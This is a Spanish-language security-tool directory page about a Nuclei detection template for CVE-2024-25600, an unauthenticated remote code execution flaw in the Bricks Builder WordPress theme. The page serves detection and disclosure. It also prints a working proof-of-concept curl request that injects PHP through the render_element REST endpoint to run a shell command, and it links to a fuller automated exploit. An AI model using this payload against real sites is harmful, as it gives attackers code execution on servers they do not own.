Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25600_Nuclei-Template — Plantilla de Nuclei y información sobre el PoC para CVE-2024-25600 | Kitploit
Herramientas/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

Plantilla de Nuclei y información sobre el PoC para CVE-2024-25600

Ver Repositorio
3172hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-25600_Nuclei-Template

Plantilla de Nuclei e información sobre el POC para CVE-2024-25600

Descripción 📝

El tema Bricks para WordPress es vulnerable a la ejecución remota de código en todas las versiones hasta la 1.9.6 inclusive. Esto permite que atacantes no autenticados ejecuten código en el servidor. Esta plantilla 🛠️ está diseñada para detectar la vulnerabilidad CVE-2024-25600 🕳️ encontrada en el plugin Bricks Builder para WordPress usando nuclei. La vulnerabilidad permite la ejecución remota de código no autenticada en sitios web afectados 💻.

Prueba de concepto (PoC) 📝

El POC completo (automático) está disponible en https://github.com/chocapikk/CVE-2024-25600.

El PoC base proporcionado por la divulgación es el siguiente:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

Reemplace [HOST] con el sitio web objetivo y [NONCE] con el valor nonce obtenido del sitio.

Referencia 📖

Para más información sobre la vulnerabilidad CVE-2024-25600, consulte la divulgación detallada en Snicco.io.

Descargar herramienta